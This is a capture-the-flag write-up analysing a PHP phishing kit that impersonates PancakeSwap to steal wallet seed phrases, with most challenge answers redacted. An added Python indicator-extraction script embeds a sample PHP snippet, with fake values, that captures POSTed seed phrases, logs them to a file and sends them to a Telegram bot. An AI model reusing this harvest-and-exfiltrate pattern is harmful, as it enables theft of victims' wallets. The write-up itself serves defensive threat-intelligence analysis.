CyberDefenders Write-up: GrabThePhisher

Nisarg Suthar
3 min read · Nov 2, 2022


Disclaimer:

All the answers apart from the obvious will be redacted to encourage defenders to try the challenge themselves.

The Prompt:

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you are requested to analyze it and do your threat intel homework.

1. Which wallet is used for asking the seed phrase?

Locate the phishing kit code and the wallet name is found exposed along with other information helpful for further questions.

The wallet used is exposed in the kit.

2. What is the file name that has the code for the phishing kit?

Those familiar with a PHP website directory structure can locate the phishing kit right away with the filename of the phishing landing page.

3. In which language was the kit written?

As seen in the first screenshot, it is written in PHP.

4. What service does the kit use to retrieve the victim’s machine information?

Observe that the kit uses the file_get_contents PHP function to issue a GET request to a URL that leads to the service API, and then stores the JSON response in the variable $array. The service whose API was leveraged is visible in plaintext in the URL.

5. How many seed phrases were already collected?

Notice the file in the directory to which the new data is appended. Each new entry is separated from the previous one by a newline character before it is appended, so one line corresponds to one collected entry.

6. Write down the seed phrase of the most recent phishing incident?

All seed phrases are written to the file from Q5. The last one is obviously the most recent one.

7. Which medium had been used for credential dumping?

The attacker was using a Telegram bot to harvest all the wallet seed phrases. The URL shows the Telegram Bot API being called, with the required parameters passed in the GET query string.

8. What is the token for the channel?

Visible in plaintext in phishing kit.

9. What is the chat ID of the phisher’s channel?

Visible in plaintext in phishing kit.
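As an added example (not the challenge kit and not the author's code), the Python script below does mechanically what questions 4 to 9 ask you to do by hand: it finds the literal URLs handed to file_get_contents, separates the Telegram Bot API call (bot token, API method, chat_id) from any other lookup service, spots the local file that harvested entries are appended to, and counts and orders the entries in that file. The PHP snippet and the harvest log are constructed stand-ins with fake values; the kit's real file name, lookup service, token and chat ID are deliberately not reproduced.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Constructed stand-in for a kit's PHP source; NOT the real pankewk.zip.
# The hostname, bot token, chat_id and seed phrases below are all fake.
SAMPLE_KIT_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$array = json_decode(file_get_contents("http://ipinfo.example/" . $ip . "/json"), true);
$seed = $_POST['seed'];
file_put_contents("data/seeds.txt", $seed . "\n", FILE_APPEND);
$text = urlencode("Wallet: ExampleWallet | Seed: $seed | IP: $ip | Country: " . $array['country']);
file_get_contents("https://api.telegram.org/bot123456789:EXAMPLE-FAKE-TOKEN_abc/sendMessage?chat_id=987654321&text=$text");
?>'''

# Constructed harvest log in the kit's newline-separated format (three fake entries,
# with a blank line to show that empty lines are not counted).
SAMPLE_SEED_LOG = "alpha bravo charlie\nlima mike november\n\noscar papa quebec\n"

# Any literal http(s) URL handed to file_get_contents (the kit uses it as its HTTP client).
FGC_URL = re.compile(r'file_get_contents\(\s*"(https?://[^"]+)"')
# Telegram Bot API call shape: api.telegram.org/bot<numeric id>:<secret>/<method>
TG_CALL = re.compile(r'api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)')
CHAT_ID = re.compile(r'chat_id=(-?\d+)')
# file_put_contents(<file>, ..., FILE_APPEND) marks the on-disk harvest file.
APPEND_FILE = re.compile(r'file_put_contents\(\s*"([^"]+)"[^;]*\bFILE_APPEND\b')


@dataclass
class KitIndicators:
    lookup_hosts: List[str] = field(default_factory=list)   # e.g. an IP-info service (Q4)
    harvest_files: List[str] = field(default_factory=list)  # local files entries are appended to (Q5)
    bot_token: Optional[str] = None                         # Telegram bot token (Q8)
    chat_id: Optional[str] = None                           # receiving chat id (Q9)
    api_method: Optional[str] = None                        # e.g. sendMessage (Q7)


def analyze_kit(php_source: str) -> KitIndicators:
    """Pull collection and exfiltration indicators out of a kit's PHP source."""
    ind = KitIndicators()
    for url in FGC_URL.findall(php_source):
        tg = TG_CALL.search(url)
        if tg:
            ind.bot_token, ind.api_method = tg.group(1), tg.group(2)
            cid = CHAT_ID.search(url)
            ind.chat_id = cid.group(1) if cid else None
        else:
            host = urlparse(url).hostname
            if host and host not in ind.lookup_hosts:
                ind.lookup_hosts.append(host)
    ind.harvest_files = APPEND_FILE.findall(php_source)
    return ind


def parse_seed_log(log_text: str) -> List[str]:
    """One harvested entry per non-empty line, oldest first (append order)."""
    return [line.strip() for line in log_text.splitlines() if line.strip()]


def count_seeds(log_text: str) -> int:
    return len(parse_seed_log(log_text))


def most_recent_seed(log_text: str) -> Optional[str]:
    entries = parse_seed_log(log_text)
    return entries[-1] if entries else None


def redact_token(token: str) -> str:
    """Keep the numeric bot id (useful for correlating kits) and mask the secret
    part, so the token can go into a report without being reusable."""
    bot_id, _, _secret = token.partition(":")
    return f"{bot_id}:{'*' * 8}"


if __name__ == "__main__":
    ind = analyze_kit(SAMPLE_KIT_PHP)
    print("lookup service(s):", ind.lookup_hosts)
    print("harvest file(s):  ", ind.harvest_files)
    print("exfil:", ind.api_method, "via bot", redact_token(ind.bot_token), "to chat", ind.chat_id)
    print("entries collected:", count_seeds(SAMPLE_SEED_LOG), "| latest:", most_recent_seed(SAMPLE_SEED_LOG))
```

Run it against an unpacked kit by reading the landing page's PHP into analyze_kit and the harvest file into count_seeds and most_recent_seed. The regexes only catch literal string URLs; a kit that builds its URL from concatenated variables would need the pieces followed by hand, which is exactly the step the write-up describes for Q4.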

10. What is the alias of the phish kit developer?

Visible in plaintext in phishing kit.

11. What is the full name of the Phish Actor?

For the last two questions, we can use the public Telegram API to make some requests and get the additional information.

The API method used by the kit is sendMessage.

A quick look at the Telegram Bot API documentation reveals another method that returns a Chat object, and the Chat object contains the full name and the username.

As the docs state, in a private chat the first_name, last_name and username fields describe the other party, meaning the attacker in this case.

This is accessed from the Telegram web app. It is quite a smart technique to exfiltrate data via a Telegram bot to the attacker's personal account: since the kit works through plain API requests, it requires no authentication on the host side. The bot just needs to be live, and it will keep relaying the seed phrases from all the phished endpoints to the attacker.

12. What is the username of the Phish Actor?

Answered in Q11. For additional information, such as the username of the Telegram bot used, try the getMe method.


Nisarg Suthar

DFIR & CySec Aficionado.
